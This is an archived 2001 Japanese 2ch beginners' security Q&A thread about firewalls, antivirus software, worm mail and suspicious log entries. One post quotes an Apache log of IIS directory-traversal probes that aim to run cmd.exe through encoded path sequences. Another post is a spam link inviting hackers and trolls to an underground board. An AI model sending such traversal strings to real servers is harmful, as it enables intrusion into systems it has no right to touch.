5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

■ 初心者用質問スレッド Part5 ■

1 :1:01/12/14 18:36
セキュリティ関係で、どこに質問したら良いかわからない人は
こちらにどうぞ。

前スレhttp://pc.2ch.net/test/read.cgi/sec/1006374515/l50

関連リンク >>2-10 >>11-20
各種フィヤーウォール ログ解析ツール 日本語化パッチ等
セキュリティチェックサイト whois 解説サイト 最新ウィルス情報などは>>2
関連スレ・関連板は>>3
その他>>4-10
ずれていたら>>1-50参照

2 :1:01/12/14 18:37
【各種 Firewall】
ZoneAlarm http://www.zonelabs.com/
Sygate Personal Firewall http://www.sygate.com/
Tiny Personal Firewall http://www.tinysoftware.com/
AtGuard http://download.lycos.com/swbasic/BasicResults.asp?query=atgd322
BlackICE Defender http://www.toyo.co.jp/security/
Snort for Win32 http://www.datanerds.net/~mike/snort.html
【ログ解析ツール】
ICEWatch http://keir.net/icewatch.html
ZoneLog Analyser http://zonelog.co.uk/
TPF Log Analyzer (Tiny Personal Firewall用)
http://server47.hypermart.net/tinyfirewall/
【日本語パッチ 等】
ZoneAlarm Pro体験版 http://www.zonelabs.com/zap_download_trial_4.htm
ZoneAlarm 日本語化パッチ その 1 http://etcd.virtualave.net/
ZoneAlarm 日本語化パッチ その 2 http://www.ryulife.com/net/security/index.html
Tiny Personal Firewall 日本語化パッチ
http://www.geocities.co.jp/SiliconValley-Cupertino/2943/

【セキュリティ チェックサイト
Shields UP ! https://grc.com/x/ne.dll?bh0bkyd2
Shields UP ! の日本語解説サイト http://www.upsizing.co.jp/news/report0426.htm
Symantec Security Check http://security2.norton.com/common/1033/sym/sym_intro.asp
Secure Design - Port Scan Security Check
http://www.sdesign.com/securitytest/
セキュリティチェックサイトのリンク集
http://www.toyo.co.jp/security/ice/advice/Support/KB/q000026/default.htm
【Whois】
APNIC http://www.apnic.net/
JPNIC Whois Gateway http://whois.nic.ad.jp/cgi-bin/whois_gw
IPドメインSEARCH MSE株式会社 http://www.mse.co.jp/ip_domain/index.shtml
【解説サイト】
Firewall 解説サイト Fire & Forest http://eazyfox.tripod.co.jp/
Snort 解説サイト http://www.port139.co.jp/ntsec_snort.htm

ウィルス情報はこの辺で得られます。
http://www.ipa.go.jp/security/index.html
http://www.symantec.com/region/jp/
http://www.trendmicro.co.jp/
http://www.nai.com/japan/

3 :1:01/12/14 18:38
[過去スレ・関連スレッド・関連板]

Part 4 http://pc.2ch.net/test/read.cgi/sec/1006374515/l50
Part 3 http://pc.2ch.net/test/read.cgi/sec/1000914322/

最強のファイアーウォールソフトって何かな?http://pc.2ch.net/test/read.cgi/sec/988724444/l50
最強のウィルス対策用ソフト http://pc.2ch.net/test/read.cgi/sec/1000957607/l50
ZoneAlarm Part3 http://pc.2ch.net/test/read.cgi/sec/1006399748/l50
Tiny Personal Firewall Part2 http://pc.2ch.net/test/read.cgi/sec/1006423282/l50
_■■BlackICEスレ■■_ http://pc.2ch.net/test/read.cgi/sec/992171869/l50
SygatePersonalFireWall http://pc.2ch.net/test/read.cgi/sec/993936202/l50

ノートン Internet Securoty2002 Ver.3 http://pc.2ch.net/test/read.cgi/sec/1007009737/l50
ウイルスバスター2002 http://pc.2ch.net/test/read.cgi/sec/1002745629/l50
マカフィーってだめなの!PART2 http://pc.2ch.net/test/read.cgi/sec/1007480057/l50

AVG Anti-Virus http://pc.2ch.net/test/read.cgi/sec/1001835534/l50
H+BEDV Antivir Personal Edition http://pc.2ch.net/test/read.cgi/sec/1004122172/l50
アンチドートを語ろう♪ http://pc.2ch.net/test/read.cgi/sec/1003987914/l50

このウイルス何? http://pc.2ch.net/test/read.cgi/sec/999636595/l50

[Windows板] 広告カットとファイヤーウォールソフ ト。
http://yasai.2ch.net/win/kako/971/971411733.html
[パソコン一般板] 自分のパソコンへの不正侵入対策してますか?2
http://salad.2ch.net/pc/kako/980/980600110.html
[初級ネット板] 簡易ファイアーオール
http://mentai.2ch.net/hack/kako/972/972826108.html

パソコン初心者@2ch掲示板 http://pc.2ch.net/pcqa/
初級ネットワーク@2ch掲示板 http://pc.2ch.net/hack/
windows@2ch掲示板 http://pc.2ch.net/win/
ソフトウェア http://pc.2ch.net/software/
ダウンロードソフト(download板) http://pc.2ch.net/download/
パソコン一般@2ch掲示板 http://pc.2ch.net/pc/

4 :1:01/12/14 18:38
「森で遊ぼう」
(ファイヤーウォール等セキュリティ関係解説サイト
ダウンロードページのリンク 日本語解説ページあり)
http://eazyfox.tripod.co.jp/


・IE(インターネットエクスプローラ)やOE(アウトルックエクスプレス)
は危ないと感じた人達へ

ネスケ(ネットスケープコミュニケータ)を使用する
という手段があることも念頭にいれておいてください
http://home.netscape.com/ja/

5 :1:01/12/14 18:41
http://pc.2ch.net/test/read.cgi/sec/1006374515/l50

このスレは まだ準備中です
しばらくの間は前スレを利用してください

6 :名無しさん@お腹いっぱい。:01/12/14 20:43
○ネットセキュリティー板 質問、雑談スレッド[3]○
http://pc.2ch.net/test/read.cgi/sec/1006859839/l50

7 :名無しさん@お腹いっぱい。:01/12/14 20:44
ファイアーウォールソフト 総合スレッド Part2
http://pc.2ch.net/test/read.cgi/sec/991646115/l50

8 :名無しさん@お腹いっぱい。:01/12/14 20:45
くだらねぇ質問はここに書き込め Ver212
http://pc.2ch.net/test/read.cgi/sec/1002134745/l50

9 :名無しさん@お腹いっぱい。:01/12/16 00:24
乙彼>>1

10 :名無しさん@お腹いっぱい。:01/12/16 13:40
前スレdat落ちしたのでageておく

11 :名無しさん@お腹いっぱい。:01/12/16 14:00
NISを使っている環境で、NAV+ZoneAlarmを使いたい場合は
NISをアンインストールしないといけないの?

12 :名無しさん@お腹いっぱい。:01/12/16 15:18
ほんとにこういうスレはありがたいよね。
1さん、お疲れ様。

13 :名無しさん@お腹いっぱい。:01/12/16 16:25
>>3
追加
スパイウエア発見専用ソフト「Ad-aware」
http://pc.2ch.net/test/read.cgi/sec/1003749900/l50

14 :ICMP:01/12/16 17:36
よろしくお願いします。
ICMPというものが、ファイアーウォールのログに大量に
残っているのですが、これは何らかのアタックなのでしょうか?

15 :名無しさん@お腹いっぱい。:01/12/16 22:45
クロスアップデート版について。
我がノートPCに、マキャフィーがプレインストール
されていたのですが、そんな私にも、クロスアップデート版は
適切ですか?

マキャフィーから乗り換える方用ですってのはわかってるん
ですけど、値段が安いですよね、なにか作業がいるんでしょうか。
っていうか、どうやって乗り換えるか否かをソフトが判定するん
でしょうか。

製品版か、どっち買ったらいいのかな。教えてくださいえらい人。

16 :名無しさん@お腹いっぱい。:01/12/17 01:07
WinXP home editionを使用してるのですが、NIS2002の
アンインストールが出来なくなりました。
スタートメニューのNISのアンインストールはAdministratorでないとできないので、
Safe mode起動をしましたが、 グラフィカルモードを使用しろとエラーを吐きます。
仕方なくコントロールパネルから試行すると、致命的なエラーになった上、
NISが使用出来なくなりました。どうにか修復する方法はないでしょうか?

17 :名無しさん@お腹いっぱい。:01/12/17 01:27
>>16
Administratorでログオンしてアンインストール
できないの?

18 :大トロ腐ってる:01/12/17 01:38
トレンドマイクロのオンラインスキャンをかけると3回に1回くらいトロイの木馬が検出されます.
「再起動すると駆除されます」とダイアログが出てから全ファイルのスキャンが始まり,感染ファイルは見つかりません.
再起動後,駆除用(?)のDOS窓が開いて,もう一度オンラインスキャンをかけるとなにも出ないのですが,2,3回パソコンを再起動してからオンラインスキャンをかけるとまたトロイが検出されます.

これってパソコンの中のファイルのどれかが感染してるのでしょうか?
OS再インストールしたほうが良い?

19 :大トロ腐ってる:01/12/17 01:45
↑環境はwin2000 pro SP1です.
ワクチンソフトは入ってません.

20 :名無しさん@お腹いっぱい。:01/12/17 01:49
>>15
根本的にマカフィー以外の製品を使うことを
おすすめします

詳しくは>>3のマカフィーってだめなの!
のスレでわかると思います

21 :名無しさん@お腹いっぱい。:01/12/17 02:18
マカフィー「から」「乗り換える」んよ。たとえばNISに。
で、製品版か、CU版か。はう〜。
いいや、製品版買ってくればまちがいないよね。みなさんおやすみ。

22 :ががが:01/12/17 03:05
サイト荒らしにあい、
それ以降ウイルスが毎日、公開アドレスに送られてきます。
BADTRANSBか、サーカムがほとんどです。
これはやはり手動で送信? オートスケジューラとかあるんですかねえ。

あと、さすがに毎日だけあって、メアドが毎日違います。
あれはヘッダ情報を変えてるんでしょうか?
どうやるんだろう。
で、これが本当に偽装メアドだとして、
本メアドを探り当てるにはどうすればいいでしょうか。

教えてくれたらなんかお礼します。

23 :ななしーぬ:01/12/17 03:46
>22
あなたが「サイト荒らしにあ」ったのがいつか判りませんが、
ウィルスメールは、それとは無関係に来ているのだと思います。
たぶん偶然、ウィルスの流行とサイト荒らしのタイミングが一致したのでは。
ちなみにうちにも、毎日ウィルスが届きます。掲示板も無いし、荒らしにあったこともありません。
メールアドレスも、当然ぜんぶ違います。
なんでも悪意に解釈しないほうが良いでしょう

24 :名無しさん@お腹いっぱい。:01/12/17 04:03
オンラインスキャンでトロイが検出されたみたいだけど
これってつまり誰かにずっと見られてたって事なんですか?
ウィルスバスターについてるファイアーウォールとか言うのは
ちょっとは役に立ってるのでしょうか?

25 :ががが:01/12/17 04:07
>>23
残念ですが、全てのメアドは返信しても戻ってきてしまいます。
そういうことなんです。

26 :ななしーぬ:01/12/17 04:22
>25
メールのアンダーバー消しても?

27 :名無しさん@お腹いっぱい。:01/12/17 07:55
>>17
XPのHome Editionはセーフモード起動でないとAdministratorになれないようです。
セーフモードではインストーラーが動いてくれなく、何も出来ない状況になってしまいました。

28 :ななしさん:01/12/17 08:34
98SEを、クリーンインストールして、その状態でie6を
ダウンロード、その後ZONEALARMを入れました。
今までは、ぞぬを入れていてもほとんどパソコンに
アクセスはなかったのですが、今回クリーンインストールしてからは
ネットにつないだ直後に必ずport6699にアクセスがあります。
今3分もたっていませんが、すでに3回アタックがあります。
ieをダウンロードしている間firewallを起動してなかったので、
何かされたのかと思ってとても不安です。

ちなみに、今警告で
the firewall has blocked ineternet access to your
computer (tcp port 6699)from 66.75.158.131(tcp port 4023)
(tcp flags:s)

1st of 2 alerts
とでています。
何かされたのでしょうか・・・?
心配なので、よろしくお願いします。

29 :ななしさん:01/12/17 08:35
またきました。同じipからです。

30 :ななしさん:01/12/17 08:39
また・・・同じipです。

31 :名無しさん@お腹いっぱい。:01/12/17 08:45
あなたの前にそのIPを持ってた人がWinMX使ってたんでしょう、たぶん。
さほど気にする必要はなしです。

32 :ななしさん:01/12/17 08:50
IPは固定じゃないんですが・・・
今繋げなおして見ています。
61.150.126.69から(http)にきました。

33 :ななしさん:01/12/17 09:00
今また一度切って繋いだら、
the firewall has blocked routed traffic from
78.112.61.211 to 96.1.0.0(igmp)
とでました。。。

やたらと多くないですか?
何度ももうしわけありませんが・・・

34 :名無しさん@お腹いっぱい。:01/12/17 10:06
騒ぎすぎ。

35 :ななし:01/12/17 11:26
>33
どっちにしろブロックできているんだから、気にする必要無いと思いますが。

36 :ががが:01/12/17 11:53
>メールのアンダーバー消しても?
?意味がわかりません…

37 :名無しさん@お腹いっぱい。:01/12/17 12:00
かなりがいしゅつなのかのしれませんが
自分なりに探して見つからなかったので
質問させてください。
NAV2002を使っていてメールから
W32.Badtrans.B@mmを検出したんですけど
検疫も削除もできません。どうすればいいでしょうか。
定義ファイルは最新でOSは98、メーラーはBecky2です。

38 :ななしーぬ:01/12/17 12:06
>36
すまん、意味不明な書き方だったな。バッドトランスなら
メールアドレスのアタマんところに「_」が付いていますよね。
それを消して送っても、戻ってきますか?

39 : :01/12/17 12:07
>>36
引用元が分からないんだけど、
BadTransなら、メールアドレスの前に_(アンダースコア)を付ける
という小細工をやるから、通常の「返信」では届かない。
その一文字を消してやれば届くわけ。
ただし、必ずではない。デフォルトの送信元として、いいかげんな
アドレスを使ってくる場合があるので。
詳しく知りたければ、トレンドマイクロとかシマンテックのサイトへ。

>>37
がいしゅつというか、BadTransのスレ見るべし。
大体分かっていることはまとめてあるし、それでも分からなければ
質問するべし。
での、NAV使っているならシマンテックのサイトに行って
調べる方がいいかもしれんな。

40 :37:01/12/17 12:30
直接的な解決じゃないかもしれませんが
nPOPというソフトでサーバーから直接メールを削除しました。
あちがとうございました。

41 : ◆KINGWsAo :01/12/17 13:41
ウィルスについての質問をします。

先日社内で5台ほどのPCがウィルスにかかり(当時の担当者不在でウィルス名不明)
その5台全てフォーマットをかけて初期状態に戻しました。
ですが、一週間ほど経った現在そのうちの2台がエクスプローラーを開けない状態になりました。
ビジー状態になります。IEの方は開くことが出来ますがしばらく経つとエクスプローラーの
ビジー状態のエラーとともにフリーズしてしまいます。

ウィルススキャンをかけたのですがウィルスは見当たりません。
PCは全てゲートウェイでIEは5.0を使用しています。

何か解決方法や同じ症状になった方いたら教えていただきたいのですが
よろしくお願いします。

42 :名無しさん@お腹いっぱい。:01/12/17 14:00
>>41
ウイルスの影響じゃないと思うんだけど。

43 : ◆KINGWsAo :01/12/17 14:26
>42
レスありがとうございます。
エクスプローラーの原因ですかね?

44 : :01/12/17 15:31
>>43
ファイルが壊れているのか、レジストリがおかしくなったか、
いろいろ考えられるからなあ。
スキャンディスクでクラスタスキャン(完全)してみるとか、
scanreg /fix
とかで直ったらもうけものなんだけど。
俺も多分ウイルス関係じゃないように思うなあ。

45 : ◆KINGWsAo :01/12/17 15:40
>44
レスありがとうございます。
早速試してみます。ありがとうございました。

46 :名無しさん@お腹いっぱい。:01/12/17 19:09
初心者の下らない相談ですみません。

昨日、HPをハッキングされ、ある1つのディレクトリー中の数十個のファイルをdeleteされてしましました。
本日、ISPに連絡してパスワード等変更し、調べてもらったところ、deleteした人物は串を通していなかったようです。
県警に届ければ相手側のispに情報開示を請求できるとのことですが、損害賠償など求めることはできるのでしょうか(ごめんなさい、と謝ってくれるだけでもいいですが)?
というかIPだけから犯人の特定は可能なものなのでしょうか?

よろしくお願いいたします。

47 :名無しさん@お腹いっぱい。:01/12/17 19:12
>>46
相手ISP側がログ公開等の協力をしてくれれば可能。
でも串通してなかったんでしょ?
多分踏み台だよ、それ。

48 :名無しさん@お腹いっぱい。:01/12/17 19:15
ちわす、はじめまして。
モナー板などで本日猛威を振るったらしいフシアナサントラップ
について解説キボンヌ。
http://news.2ch.net/test/read.cgi/newsplus/1008578204/
どーゆー仕組みでこういう事が可能なの?対策は?

49 :48:01/12/17 19:17
ありゃ、よく見たらここにも関連スレ立ってましたね
http://pc.2ch.net/test/read.cgi/sec/1008581128/l50
こっちを観察しま〜す。

50 :46:01/12/17 19:24
>47
答えてくださってありがとうございます。

踏み台の場合ですと、やはり犯人の特定は難しいでしょうか?
もし難しい場合は警察も非協力的でしょうし、遡及はあきらめようかとも思います。

51 :名無しさん@お腹いっぱい。:01/12/17 19:42
>>50
いや、取り敢えず行っておけ。
放っておくと再犯の可能性が大。

52 :46:01/12/17 20:22
>51
そうですね。
努力できる部分は頑張ってきます。

どうもありがとうございました。

53 :名無しさん@お腹いっぱい。:01/12/17 21:32
ズバリお聞きします。
初心者でも簡単に扱えるファイアウォールはどれでしょう?

54 :名無しさん@お腹いっぱい。:01/12/17 21:39
>>53
zone alarmじゃないの?
使ったことないからよく知らんけど。

55 :53:01/12/17 22:11
>>54
英語出来ないです。

56 :名無しさん@お腹いっぱい。:01/12/17 22:27
掲示板からIPを抜く方法を説明しているようなサイトってありませんでしょうか?
あるBBSにて、目に余る行為をするものがいるのでISPに連絡をしたいんです。
普通は管理人さんが行うべきことなんですが、ぶっちゃけその対象が管理人でして。
無断転載を注意で済めば良かったんですが、聞く耳を持たない様子。
フリースペース+レンタルBBSなんですけど、方法はあるんでしょうか?

57 :名無しさん@お腹いっぱい。:01/12/17 23:29
***チャットのPMからどうやってIP抜くの?*** の1=>>56
http://pc.2ch.net/test/read.cgi/sec/1008566152/l50

58 :名無しさん@お腹いっぱい。:01/12/18 00:32
>>57
違うよー。

誰か最初の一歩だけでも…。

59 :名無しさん@お腹いっぱい。:01/12/18 00:45
>>56
そんな掲示板行かなきゃいいじゃん

60 :名無しさん@お腹いっぱい。:01/12/18 00:58
windows板から来ました。こっちの方が専門的というのを伺いましたので。
McAfee VirusScanがプリインストールされているパソコン(WinMe)をXPにアップグレードしました。
ところが、McAfee VirusScanがXPに対応していないようで動作しません。
アンインストールもできない状態になってしまいました。
最善の対処方法を教えてください。お願いします。

61 :名無しさん@お腹いっぱい。:01/12/18 01:03
http://pc.2ch.net/test/read.cgi/win/1008604281/
新たなセキュリティホール

62 :名無しさん@お腹いっぱい。:01/12/18 01:06
>>60
XPをまずアンインストールしてからやってみて

63 :名無しさん@お腹いっぱい。:01/12/18 01:11
>>62
ありがとうございます。
できれば、あまり手間がかからないほうが良いのですが(他人のパソコンの為)
なんか良い方法ありませんでしょうか?

64 :名無しさん@お腹いっぱい。:01/12/18 01:13
>>63
それしかないと思うぞ
とにかくOSの上書きアップデートはこれからはしないように
トラブルの原因になる

65 : :01/12/18 01:19
回線切ったあとすぐにパソコンからどこかに電話するんだけど
これってウイルスのせい?

66 :名無しさん@お腹いっぱい。:01/12/18 01:20
>>65
どっかってどこよ?
ウイルスはさすがに電話かけないぞ

67 :むむ:01/12/18 01:36
板違いですが…。

登山キャンプ板のあるスレの59の書き込みが発端で大変なことになってます。
59の行ったテロとも言える行為でその後のレスがすごいです。

http://yasai.2ch.net/test/read.cgi/out/1007547069/

59の悪行みてやってください。
そのあとのビビリレスも見てやってください。

68 :名無しさん@お腹いっぱい。:01/12/18 01:38
>>67
宣伝すな!

69 :名無しさん@お腹いっぱい。:01/12/18 02:13
フリーの掲示板にうっかり個人情報を載せてしまいました。
発言自体は消したのですがGoogleのキャッシュに残ってしまっています。
これを消すにはどうしたらよいか、御存知の方はいらっしゃいませんでしょうか?

板違いでしたら申し訳ございません。
6〜8週間たてば自動的に更新されて消えるものなのでしょうか。
だといいのですが…。

70 :名無しさん@お腹いっぱい。:01/12/18 02:15
うちのマシンに「Ptsnoop」というのが常駐してます。
調べたところ、
同じ名前のウィルスが存在することがわかりました。
しかし、モデムのドライバーにも同じ名前があることがわかりました。
http://www.fs-support.yamada.co.jp/df/v-descs/v-descs2/ptsnoop.htm

で、自分のマシンに入り込んでるのがどっちかわかりません。
モデム用のソフトならば消すわけにはいかないので困ってます。
ちなみにモデムはzolrix製です。

ptsnoop.exeのある場所は、c:\ptsnoop.exeで、ウィルス情報に載ってる場所とは
違うのですが、win.iniに「load=」の形で書かれているというところはウィルス情報通りでした。
これはウィルスなんでしょうか?

71 ::名無しさん@お腹いっぱい。:01/12/18 02:18
よろしくおねがいします。
DSLのセキュリテーのためにメルコのLanneedというルーターを
買いましたが、設定できません。メーカーは、いつも話し中で連絡とれず
よろしくお願いします。

数字を設定し、保存をクリックするのですが、保存できず、あとがつづきません。
W98,IE6です。

72 :名無しさん@お腹いっぱい。:01/12/18 02:30
>>71
板違いだと思うんだが。

73 ::名無しさん@お腹いっぱい。:01/12/18 02:31
72>そうですか。すみません。

74 :名無しさん@お腹いっぱい。:01/12/18 03:21
Block Backdoor/SubSeven Trojan というのを
internet security がブロックしたみたいなんですけど
これってウィルス感染してるという事でしょうか?
もし感染してたらどうすれば良いのでしょうか?

75 :名無しさん@お腹いっぱい。:01/12/18 03:25
>>74
なぜウイルススキャンをしないのだ??

76 :名無しさん@お腹いっぱい。:01/12/18 03:39
>75
はい 直ちに

77 :名無しさん@お腹いっぱい。:01/12/18 03:44
74の者です。
ウィルススキャンには引っ掛からないみたいなんですが
安心して良いものでしょうか?

78 :名無しさん@お腹いっぱい。:01/12/18 04:34
>>74
それは SubSeven(トロイ)用のポートに向けて
無差別にパケットを飛ばしてるヤツがいるだけで、

あんたのPCにSubSevenが
入ってたとしたらNISがその通信をブロックした、
入ってなかったら単にゴミパケットが飛んできた、
…というだけだ。

79 :名無しさん@お腹いっぱい。:01/12/18 06:02
あるHPにアクセスした際、ノ−トンのPFWが以下の注意報を
接続を切るまで延々と繰り返し出してました。

ファイアウォール Event Log
01/12/18 スーパーバイザ
未使用ポート遮断機能が通信を遮断しました。
詳細:インバウンド TCP 接続
リモートアドレス、 ローカルサービスは
www.nagoya-mag.co.jp(210.162.119.170),auth(113)

これはここの“仕様”なのでしょうか?
それとも、なにやら良からぬ意図のモノなのでしょうか?

80 :名無しさん@Emacs:01/12/18 11:16
>>69
http://www.google.com/intl/ja/remove.html

>>79
たしかに113に来るけど、うちには単発で、連続しては来ないな。
延々と出続けるのなら、経路上のルータのどこかで113の通過に
なんらかの規制がかけられていてリトライしてる可能性あり。
auth(113)だったら害はないので、うざいかもしれんが放置しとけや。
ここに限らず、sendmail を使ってるメル鯖ならかなりの確率で
接続と同時に 113 にパケットを飛ばしてるよ。

81 :名無しさんに接続中…:01/12/18 14:17
Apacheのログみたら誰かが下のようにアクセスしようとしてるのですが、
彼は何をしたいのでしょうか。DQNな質問すみません。

216.125.4.213 - - [07/Dec/2001:18:41:27 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 286
216.125.4.213 - - [07/Dec/2001:18:41:27 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 284
216.125.4.213 - - [07/Dec/2001:18:41:27 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294
216.125.4.213 - - [07/Dec/2001:18:41:28 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 294
216.125.4.213 - - [07/Dec/2001:18:41:28 +0900] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
216.125.4.213 - - [07/Dec/2001:18:41:29 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325
216.125.4.213 - - [07/Dec/2001:18:41:29 +0900] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 325
216.125.4.213 - - [07/Dec/2001:18:41:30 +0900] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 341
216.125.4.213 - - [07/Dec/2001:18:41:30 +0900] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
216.125.4.213 - - [07/Dec/2001:18:41:30 +0900] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
216.125.4.213 - - [07/Dec/2001:18:41:31 +0900] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
216.125.4.213 - - [07/Dec/2001:18:41:31 +0900] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307
216.125.4.213 - - [07/Dec/2001:18:41:31 +0900] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 291
216.125.4.213 - - [07/Dec/2001:18:41:32 +0900] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 291
216.125.4.213 - - [07/Dec/2001:18:41:32 +0900] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308
216.125.4.213 - - [07/Dec/2001:18:41:33 +0900] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308

82 :名無しさん@Emacs:01/12/18 14:23
>>81
ログにある文字列をgoogleに放りこめ。タコが。
今さらこんな質問をするヤツに限って、
「うちはIISじゃなくてApacheだから安全なんだへへん」
なんてほざくんだよな。

83 :名無しさんに接続中…:01/12/18 14:33
うちはIISじゃなくてApacheだから安全なんだへへん

http://homepage2.nifty.com/winfaq/virus_and_security.html

84 :名無しさん@お腹いっぱい。:01/12/18 14:41
最近やっとWWWサーバのログから、その文字列が減ってきたいうのに。
IISです。自分のものでないんでこれでやらなきゃしかたないです。

85 :名無しさん@お腹いっぱい。:01/12/18 14:55
ウィルスバスター・オンライン・スキャンをしようとしたのですが、
セキュリティのレベルを下げてもできません。

http://www.trendmicro.co.jp/hcall/scan.htm

ルーターを使っているのでそれが原因でしょうか?

86 :名無しさん@お腹いっぱい。:01/12/18 16:24
>>85
できないとはどういう風に?
エラーの詳細を書きなさい

87 :名無しさん@お腹いっぱい。:01/12/18 16:48
1日2〜3時間ネットに繋ぐ程度のライトユーザーなんですが
ファイヤーウォールって必要なんでしょうか?
恐いのはパソコンの中を覗かれて個人情報引き出されたり、データ消されたりする事なんで
ウィルスチェックはきっちりやってます。
サーバー立ててるわけじゃないからポートスキャンとかping攻撃されたとしても
大して影響ないような気がするんですが・・・認識が甘いでしょうか?
ご意見お聞かせくださいませ。

88 :名無しさん@お腹いっぱい。:01/12/18 16:53
>>87
ウイルスとハッキングは別物だぞ
まあ一個人を狙ってのハッキングはほぼありえないを思うが
しかもダイヤルアップだろうからIPアドレスは固定されないし

ファイヤーウォールソフトはフリーでもあるので試してみるとよい

89 :ヘルプ:01/12/18 17:47
JS_EXCEPTION.D
ttp://www.trendmicro.co.jp/virusinfo/default3.asp?VName=JS_EXCEPTION.D
の対処方教えてください。
ノートンで検出できませんが、症状からいって明らかにかかってます。

90 :89:01/12/18 17:48
×対処方
○対処法
(鬱

91 :名無しさん@お腹いっぱい。:01/12/18 17:50
>>90
IEにサービスパックをあててるのかい?

92 ::01/12/18 18:00
ZA入れてるのですが、いつも同じところからのインターネットアクセスをブロックします。
whoisで調べたら、インターソーラーとかいう会社でした。検索では見つからないのですが・・・
 これはどういう事なのでしょう?

93 :87:01/12/18 18:02
>>88
>ウイルスとハッキングは別物だぞ
あ、すみません。書き方悪かったっすね。
一応両者の区別はついてます。
トロイとかに感染しちゃうと外部からのアタック(?)でパソコン操作されちゃうんですよね。
ファイヤーウォール入れとけばそのアタックを遮断してくれるんだろうけど、
ウィスルチェックをきちんとして、感染してなければ
アタックされても痛くも痒くもないのかなぁと思ったんですよ。。
ウィスルチェックちゃんとして、TCP/IP以外の余計なプロトコルは全部削除して、
IEのセキュリティーホールを防ぐパッチを、こまめに当てていれば大丈夫ですよね?
甘いのかなぁ・・・
> ファイヤーウォールソフトはフリーでもあるので試してみるとよい
ゾーンアラームってのよく聞きますよね。検索してみますです。

94 :名無しさん@お腹いっぱい。:01/12/18 18:23
>>88
便乗質問させて下さい。
ADSLのUSBモデムですが、ライトユーザーです。
IPアドレスは固定されないので、
ダイアルアップの場合と同程度の危険度でしょうか?

95 :名無しさん@お腹いっぱい。:01/12/18 18:27
>>92
気にするな

96 :名無しさん@お腹いっぱい。:01/12/18 18:28
>>93
まあIEとOEを使わないのが一番いいのだが、、
セキュリティには日頃から注意して置くように

97 :名無しさん@お腹いっぱい。:01/12/18 18:29
>>94
んだ そのとおり
でもウイルス対策は万全にしとけよ

98 :94:01/12/18 18:53
>>97
ありがとー!

99 :っy:01/12/18 18:53
///////////////////

■ 全国のハッカー&荒らし集合!! ■




http://kgy999.ath.cx/cgi-bin/1/2.cgi
史上最悪のUG掲示板

/////////////////////

;;
;;;

100 :85:01/12/18 19:00
>>86

現在のセキュリティの設定では、このページのActiveXコントロールは実行できません。そのためこのページは正確に表示されない可能性があります。

というメッセージが表れて、スキャン機能が実行されません。
ページの下のほうには×表示された画像が表示されます。

ブラウザのセキュリティを最低にしても同じなので、
ルーターが原因だと思います。
こんなに立派なルーターなら
ファイアーウオールは必要ないのかな(ワラ

101 :名無しさん@お腹いっぱい。:01/12/18 19:02
>>100
アクティブXをONにしてるかい?
対応のブラウザでやってるかい?

まあオンラインスキャンなんて気休めだから
ウイルス対策ソフトを買ってくるべし

102 :85:01/12/18 19:15
>アクティブXをONにしてるかい?
はい
>対応のブラウザでやってるかい?
IEです。

ウィルスバスターは入れてます。
オンライン・スキャンを実行できない理由が知りたいだけ〜

103 :名無しさん@お腹いっぱい。:01/12/18 19:54
>>93
自分もちょっと思った。
アンチウィルスソフト入れとけば、ウィルスには感染しない。
「トロイの木馬」もウィルスだとすれば、感染しない。
プログラムが作動してPCの情報を外に持っていく際に
FWがあれば遮断するが、そもそも感染しないのだから
作動もしない。
とか。間違ってるけどね。

104 :名無しさん@お腹いっぱい。:01/12/18 20:57
有料になったが定義ファイルの更新は無料なんで
今だにフリーのアンチウイルスソフトInoculateIT Personal Edition
使っているんだけど、昨日からAuto Download出来ないんだけど、
ping打っても応答無しで。
正確には最新の定義ファイルのバージョンが見えて肝心のDLが始まらない。
同じような方いますか?

105 :名無しさん@お腹いっぱい。:01/12/18 20:58
>>102
ActiveXコントロールとプラグイン>有効にする

スクリプトを実行しても安全だとマークされているActivXコントロールの
スクリプトの実行>有効にする

著名済みActivXコントロールのダウンロード>有効にする

アクティブスクリプト>有効にする

これで動くはずだが

106 :名無しさん@お腹いっぱい。:01/12/18 21:04
>>104
フリーのものはやめとけよ

107 :名無しさん@お腹いっぱい。:01/12/18 21:19
>>103
うん。俺もそう思ってた…。
実際に新種のウイルスに感染するまではね。
アンチウイルス入れてても感染するときはするし、
感染した瞬間もう、トロイが動き出してるんだよ。
で、その時にFW無かったら情報漏れ漏れ…。

新種のウイルスに完全対応しようと思ったら
データのアップデートを毎日する必要がある。
ブラウザのセキュリティホールもしかり、
でも、FWは一度設定したら、そうそうアップデートの必要なし。
正しく設定していれば取りあえず情報漏れだけは防いでくれる。

108 :名無しさん@お腹いっぱい。:01/12/18 21:20
>>106
なんで?

109 :名無しさん@お腹いっぱい。:01/12/18 21:25
>>106
何故?有料がいいとは限らんぞ?
少なくとも昔のマカフィーよりは総合的に上だと思うが…。
あくまで「昔の」な? 今は知らん。

110 :名無しさん@お腹いっぱい。:01/12/18 21:45
CATVで繋いでいます。ルーター無しです。
いろいろスレを読んだのですが、Zoneと、ノートンのAntiVirus に
